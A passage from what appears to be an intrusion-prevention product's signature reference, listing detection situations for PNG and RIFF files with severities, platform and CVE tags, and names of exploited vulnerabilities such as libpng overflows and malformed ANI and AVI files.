About this situation: Detected conflicting Content-Type header
Context: PNG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-PNG_EICAR-AntiVirus-Test

About this situation: Detected an EICAR antivirus test file
Context: PNG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-PNG_Embedded-Zip-Archive

About this situation: Embedded zip archive
Context: PNG File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-PNG_Foxit-Multiple-Products-PNG-To-PDF-Conversion-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Foxit Software Enterprise Reader detected
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1845-5242
Vulnerability: Foxit-Multiple-Products-PNG-To-PDF-Conversion-Heap-Buffer-Overflow
Description:
Back to top

File-PNG_HTML-Inside-PNG-File

About this situation: Suspicious content was detected inside a PNG image file
Context: PNG File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1845-5242
Vulnerability: Stegosploit
Description:
Back to top

File-PNG_Imagemagick-PNG-Text-Profile-Arbitrary-File-Read

About this situation: An attempt to exploit a vulnerability in ImageMagick detected
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2022, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1845-5242
Vulnerability: Imagemagick-PNG-Text-Profile-Arbitrary-File-Read
Description:
Back to top

File-PNG_Imagemagick-PNG-Text-Profile-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ImageMagick detected
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1561-5242
Last changed: sgpkg-ips-1845-5242
Vulnerability: Imagemagick-PNG-Text-Profile-Denial-Of-Service
Description:
Back to top

File-PNG_Libpng-PNG-Decompress-Chunk-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in PNG Development Group libpng detected
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libpng, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-1845-5242
Vulnerability: Libpng-PNG-Decompress-Chunk-Integer-Overflow
Libpng-PNG-Inflate-Buffer-Overflow
Description:
Back to top

File-PNG_Libpng-PNG-Image-BOF

About this situation: Buffer overflow in Libpng
Context: PNG File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2005-02, CVE2004, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-407-4219
Vulnerability: Libpng-Library-tRNS-sBIT-hIST-Chunk-Handling-BOF
Description:
Back to top

File-PNG_Microsoft-Ie-PNG-Parsing-Vulnerability-CVE-2015-0080

About this situation: An attempt to exploit a vulnerability in Microsoft IE detected
Context: PNG File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2015-03, CVE2015, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1845-5242
Vulnerability: Microsoft-Ie-PNG-Parsing-Vulnerability-CVE-2015-0080
Description:
Back to top

File-PNG_Microsoft-Multiple-Products-Buffer-Overflow

About this situation: Detected attempt to exploit vulnerabilities in Microsoft GDI and Microsoft Office
Context: PNG File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-10, MS2013-06, CVE2009, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1845-5242
Vulnerability: Microsoft-GDI-Vulnerability-CVE-2009-2501
Microsoft-Office-Buffer-Overflow-CVE-2013-1331
Description:
Back to top

File-PNG_Microsoft-Windows-Gdiplus-PNG-Processing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Expression Web detected
Context: PNG File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-10, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1845-5242
Vulnerability: Microsoft-Windows-Gdiplus-PNG-Processing-Integer-Overflow
Description:
Back to top

File-PNG_Microsoft-Windows-Image-ICC-Profile-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: PNG File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1845-5242
Vulnerability: Microsoft-Windows-Image-ICC-Profile-Code-Execution
Description:
Back to top

File-PNG_Mozilla-Firefox-Animated-PNG-Processing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1845-5242
Vulnerability: Mozilla-Firefox-Animated-PNG-Processing-Integer-Overflow
Description:
Back to top

File-PNG_PHP-Payloads-Injected-In-PNG-Image

About this situation: A suspicious PNG image containing PHP payloads detected
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: PHP-Payloads-Injected-In-PNG-Image
Description:
Back to top

File-PNG_PNG-Image-With-Excessively-Large-Height-Or-Width-Value

About this situation: An excessively large PNG image detected
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, CVE2009, CVE2013, Any Operating System not specific, Any Software not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Sun-Java-Web-Start-Splashscreen-PNG-Processing-Buffer-Overflow
IBM-Notes-PNG-Image-Parsing-Integer-Overflow
Description:
Back to top

File-PNG_PNG-Image-With-Large-Data-Length-Value

About this situation: PNG image with large data length value in image chunk
Context: PNG File Stream
Severity: 2
Tags: Windows, x86, MS2005-06, MS2006-06, CVE2005, CVE2006, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-407-4219
Vulnerability: HTTP-Microsoft-Internet-Explorer-PNG-Image-Rendering-Buffer-Overflow
Microsoft-Windows-Media-Player-PNG-Image-Parsing-Buffer-Overflow
Description:
Back to top

File-PNG_PNG-Image-With-Large-Height-Or-Width-Value

About this situation: PNG image with large height or width value
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, MS2005-02, CVE2004, Any Operating System not specific, Any Software not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1845-5242
Vulnerability: PNG-GD-Graphics-Library-Rowbytes-And-Height-BOF
HTTP-Windows-Media-Player-PNG-Processing-Integer-Overflow
Description:
Back to top

File-PNG_Script-After-IEND-Chunk

About this situation: Script content at the end of a PNG image file detected
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1347-5242
Last changed: sgpkg-ips-1845-5242
Description:
Back to top

File-PNG_Script-Inside-PNG-File

About this situation: Suspicious content was detected inside a PNG image file
Context: PNG File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1845-5242
Vulnerability: Stegosploit
Description:
Back to top

File-PNG_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: PNG File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-1845-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

File-PNG_SugarCRM-EmailTemplates-Validation-Vulnerability-CVE-2023-22952

About this situation: An attempt to exploit a vulnerability in SugarCRM detected
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SugarCRM, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1584-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: SugarCRM-EmailTemplates-Validation-Vulnerability-CVE-2023-22952
Description: CVE References: CVE-2023-22952
Back to top

File-PNG_Suspicious-File

About this situation: A suspicious PNG file detected
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-498-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-PNG_Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine detected
Context: PNG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine AssetExplorer, Zoho Corporation ManageEngine SupportCenter, Zoho Corporation ManageEngine ServiceDesk, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1575-5242
Last changed: sgpkg-ips-1575-5242
Vulnerability: Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
Description:
Back to top

File-RIFF_4xm-Download

About this situation: Detected a download of 4XM video file
Context: RIFF File Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Streaming Protocols
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-753-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-RIFF_Adobe-Reader-Security-Bypass-CVE-2013-0624

About this situation: Attempt to exploit vulnerability in Adobe Reader
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-504-5211
Vulnerability: Adobe-Reader-Security-Bypass-CVE-2013-0624
Description:
Back to top

File-RIFF_Adobe-Shockwave-Director-File-Key-Chunk-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Shockwave Director detected
Context: RIFF File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Shockwave Director, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-591-5211
Vulnerability: Adobe-Shockwave-Director-File-Key-Chunk-Parsing-Buffer-Overflow
Description:
Back to top

File-RIFF_Adobe-Shockwave-Director-PAMM-Chunk-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Systems Shockwave Player detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems Shockwave Player, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-591-5211
Vulnerability: Adobe-Shockwave-Director-PAMM-Chunk-Memory-Corruption
Description:
Back to top

File-RIFF_Adobe-Shockwave-Director-tSAC-Chunk-Parsing-Memory-Corruption

About this situation: Adobe Shockware player has a vulnerability in tSAC chunk parsging which can result in arbitrary code execution
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems Shockwave Player, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-591-5211
Vulnerability: Adobe-Shockwave-Director-tSAC-Chunk-Parsing-Memory-Corruption
Description:
Back to top

File-RIFF_Adobe-Shockwave-Director-tSAC-Chunk-Termination-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Systems Shockwave Player detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems Shockwave Player, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-434-4219
Last changed: sgpkg-ips-593-5211
Vulnerability: Adobe-Shockwave-Director-tSAC-Chunk-String-Termination-Memory-Corruption
Description:
Back to top

File-RIFF_Adobe-Shockwave-Player-DIR-Files-PAMI-Chunk-Code-Execution

About this situation: An attempt to exploit a code execution vulnerability in Adobe Shockwave Player detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems Shockwave Player, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-591-5211
Vulnerability: Adobe-Shockwave-Player-DIR-Files-PAMI-Chunk-Code-Execution
Description:
Back to top

File-RIFF_Adobe-Shockwave-Player-Lnam-Chunk-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Shockwave Player detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems Shockwave Player, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-640-5211
Vulnerability: Adobe-Shockwave-Player-Lnam-Chunk-Processing-Buffer-Overflow
Description:
Back to top

File-RIFF_Adobe-Shockwave-Player-PAMI-Chunk-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Systems Shockwave Player detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems Shockwave Player, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-640-5211
Vulnerability: Adobe-Shockwave-Player-PAMI-Chunk-Parsing-Memory-Corruption
Description:
Back to top

File-RIFF_Adobe-Shockwave-Player-rcsL-Chunk-Parsing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Adobe Systems Shockwave Player detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems Shockwave Player, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Adobe-Shockwave-Player-rcsL-Chunk-Parsing-Out-Of-Bounds-Array-Indexing
Adobe-Shockwave-Player-rcsL-Chunk-Parsing-Uninitialized-Object-Access
Description:
Back to top

File-RIFF_Adobe-Shockwave-Player-rcsL-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Systems Shockwave Player detected
Context: RIFF File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Systems Shockwave Player, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-591-5211
Vulnerability: Adobe-Shockwave-Player-rcsL-Corruption
Description:
Back to top

File-RIFF_Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution

About this situation: An attempt to exploit a vulnerability in Adobe Systems Shockwave Player detected
Context: RIFF File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Systems Shockwave Player, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1617-5242
Vulnerability: Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution
Description:
Back to top

File-RIFF_Ani-Download

About this situation: Detected a download of ANI video file
Context: RIFF File Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Streaming Protocols
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-753-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-RIFF_Ani-Windows-Animationheader-Length-Buffer-Overflow

About this situation: Malicious ANI file detected, possible system compromise
Context: RIFF File Stream
Severity: 10
Tags: Windows ME, Windows 2003, Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Windows 2000 SP3, Windows 2000 SP4, Windows XP SP1, Windows XP SP0, Windows XP SP2, Windows Vista, Any Hardware, MS2005-01, MS2007-04, CVE2004, CVE2007, Windows 2003 not specific, Windows Vista not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-753-5211
Vulnerability: Ani-Windows-Animationheader-Length-Buffer-Overflow
Ani-Windows-Animated-Cursor-Code-Execution
Description:
Back to top

File-RIFF_Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service

About this situation: Malicious ANI file detected, the file may freeze Windows OS
Context: RIFF File Stream
Severity: 2
Tags: Windows NT, Windows 2003, Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Windows 2000 SP3, Windows 2000 SP4, Windows XP SP1, Windows XP SP0, Any Hardware, CVE2004, Windows NT not specific, Windows 2003 not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-753-5211
Vulnerability: Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service
Description:
Back to top

File-RIFF_AVI-Download

About this situation: Detected a download of AVI video file
Context: RIFF File Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Streaming Protocols
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-753-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-RIFF_Conflicting-Content-Type-Text

About this situation: Detected conflicting Content-Type header
Context: RIFF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-486-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-RIFF_Conflicting-Content-Type-Text-HTML

About this situation: Detected conflicting Content-Type header
Context: RIFF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-486-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-RIFF_Conflicting-Content-Type-Text-Plain

About this situation: Detected conflicting Content-Type header
Context: RIFF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-486-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-RIFF_Corel-Draw-Image-Download

About this situation: Detected a download of Corel Draw image file
Context: RIFF File Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Streaming Protocols
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-753-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-RIFF_Download

About this situation: Detected a download of RIFF media container file
Context: RIFF File Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Streaming Protocols
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-RIFF_EICAR-AntiVirus-Test

About this situation: Detected an EICAR antivirus test file
Context: RIFF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-RIFF_Embedded-Zip-Archive

About this situation: Embedded zip archive
Context: RIFF File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-RIFF_FFmpeg-4xm-Processing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in FFmpeg Project Team FFmpeg detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, FFmpeg Project Team FFmpeg, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-753-5211
Vulnerability: FFmpeg-4xm-Processing-Memory-Corruption
Description:
Back to top

File-RIFF_Microsoft-DirectShow-Audio-Decoder-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft DirectShow detected
Context: RIFF File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2010-04, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-DirectShow-Audio-Decoder-Stack-Overflow
Description:
Back to top

File-RIFF_Microsoft-DirectShow-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft DirectShow detected
Context: RIFF File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2010-02, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-DirectShow-Heap-Overflow
Description:
Back to top

File-RIFF_Microsoft-DirectX-WAV-And-AVI-File-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft DirectX detected
Context: RIFF File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Any Hardware, MS2007-12, CVE2007, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-753-5211
Vulnerability: Microsoft-DirectX-WAV-And-AVI-File-Parsing-Code-Execution
Description:
Back to top

File-RIFF_Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879

About this situation: A malicious AVI file targeting CVE-2010-1879 over HTTP detected
Context: RIFF File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2010-06, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879
Description:
Back to top

File-RIFF_Microsoft-Visual-Basic-Common-ActiveX-Control-AVI-Parsing

About this situation: An attempt to exploit a buffer overflow in Microsoft Visual Basic
Context: RIFF File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Microsoft Visual Basic, MS2008-12, CVE2008, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-753-5211
Vulnerability: Microsoft-Visual-Basic-Common-ActiveX-Control-AVI-Parsing
Description:
Back to top

File-RIFF_Microsoft-Windows-AVI-DirectX-DirectShow-AVI-Strn-Buffer-Overflow

About this situation: Detects malformed AVI files that could cause a buffer overflow in Microsoft DirectX DirectShow
Context: RIFF File Stream
Severity: 7
Tags: Windows, Any Hardware, DirectX, MS2005-10, CVE2005, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-753-5211
Vulnerability: AVI-DirectX-DirectShow-AVI-Strn-BOF
Description:
Back to top

File-RIFF_Microsoft-Windows-AVI-File-Chunck-Length-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: RIFF File Stream
Severity: 2
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-Windows-AVI-File-Chunck-Length-Integer-Overflow
Description:
Back to top

File-RIFF_Microsoft-Windows-AVI-MS09-038

About this situation: A possibly malicous AVI file targeting MS09-038
Context: RIFF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-Malformed-AVI-Header-Vulnerability-MS09-038
Description:
Back to top

File-RIFF_Microsoft-Windows-AVI-MS09-038-2

About this situation: A possibly malicous AVI file targeting MS09-038
Context: RIFF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-Malformed-AVI-Header-Vulnerability-MS09-038
Description:
Back to top

File-RIFF_Microsoft-Windows-Cinepak-Codec-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: RIFF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-08, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-753-5211
Vulnerability: Microsoft-Windows-Cinepak-Codec-Code-Execution
Description:
Back to top

File-RIFF_Microsoft-Windows-Mjpeg-Media-Decompression-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: RIFF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-06, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-Windows-Mjpeg-Media-Decompression-Code-Execution
Description:
Back to top

File-RIFF_Mozilla-Multiple-Products-WAV-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Multiple-Products-WAV-Processing-Buffer-Overflow
Description:
Back to top

File-RIFF_Nullsoft-Winamp-AVI-Stream-Count-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in NullSoft WinAmp detected
Context: RIFF File Stream
Severity: 7
Tags: Windows, Any Hardware, Winamp, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Nullsoft-Winamp-AVI-Stream-Count-Integer-Overflow
Description:
Back to top

File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, MS2013-02, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-509-5211
Vulnerability: Oracle-Outside-In-Coreldraw-File-Parser-Heap-Buffer-Overflow
Description:
Back to top

File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow
Description:
Back to top

File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow-2

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, Avantstar Quick View Plus, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-753-5211
Vulnerability: Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow-2
Description:
